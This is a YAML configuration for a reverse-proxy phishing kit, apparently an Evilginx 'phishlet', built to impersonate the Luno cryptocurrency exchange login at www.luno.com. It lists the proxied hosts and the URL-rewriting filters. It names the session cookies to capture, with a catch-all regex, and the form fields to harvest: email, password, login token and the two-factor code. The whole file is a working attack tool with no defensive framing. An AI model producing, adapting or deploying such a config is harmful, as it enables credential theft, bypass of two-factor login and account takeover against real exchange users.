author: '@An0nud4y'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'luno.com', session: true, is_landing: true}
  - {phish_sub: '', orig_sub: '', domain: 'luno.com', session: true, is_landing: false}
  - {phish_sub: 'd2wy8f7a9ursnm', orig_sub: 'd2wy8f7a9ursnm', domain: 'cloudfront.net', session: true, is_landing: false}
  - {phish_sub: 'd32exi8v9av3ux', orig_sub: 'd32exi8v9av3ux', domain: 'cloudfront.net', session: true, is_landing: false}
  - {phish_sub: 'ajax', orig_sub: 'ajax', domain: 'luno.com', session: true, is_landing: false}
  - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'siftscience.com', session: true, is_landing: false}
  - {phish_sub: 'a', orig_sub: 'a', domain: 'quora.com', session: true, is_landing: false}
  - {phish_sub: 'd', orig_sub: 'd', domain: 'impactradius-event.com', session: true, is_landing: false}
  - {phish_sub: 'analytics', orig_sub: '', domain: 'hexagon-analytics.com', session: true, is_landing: false}
  - {phish_sub: 'sessions', orig_sub: 'sessions', domain: 'bugsnag.com', session: true, is_landing: false}
  - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
  - {phish_sub: 'gstatic', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false}

         
sub_filters:
  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'google.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'gstatic.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'luno.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'luno.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'www', domain: 'luno.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'd2wy8f7a9ursnm', domain: 'cloudfront.net', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'd2wy8f7a9ursnm', domain: 'cloudfront.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'd2wy8f7a9ursnm', domain: 'cloudfront.net', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'd32exi8v9av3ux', domain: 'cloudfront.net', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'd32exi8v9av3ux', domain: 'cloudfront.net', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'd32exi8v9av3ux', domain: 'cloudfront.net', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'ajax', domain: 'luno.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'ajax', domain: 'luno.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'ajax', domain: 'luno.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'cdn', domain: 'siftscience.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'cdn', domain: 'siftscience.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'cdn', domain: 'siftscience.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'a', domain: 'quora.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'a', domain: 'quora.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'a', domain: 'quora.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'd', domain: 'impactradius-event.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'd', domain: 'impactradius-event.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'd', domain: 'impactradius-event.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: '', domain: 'hexagon-analytics.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: '', domain: 'hexagon-analytics.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: '', domain: 'hexagon-analytics.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'www.luno.com', orig_sub: 'sessions', domain: 'bugsnag.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'sessions', domain: 'bugsnag.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.luno.com', orig_sub: 'sessions', domain: 'bugsnag.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}




auth_tokens:
  - domain: '.luno.com'
    keys: ['session_id', 'IR_10534,opt', '.*,regexp'] 

credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'login_token'
      search: '(.*)'
      type: 'post'
    - key: 'code'
      search: '(.*)'
      type: 'post'      
login:
  domain: 'www.luno.com'
  path: '/en/login'
  
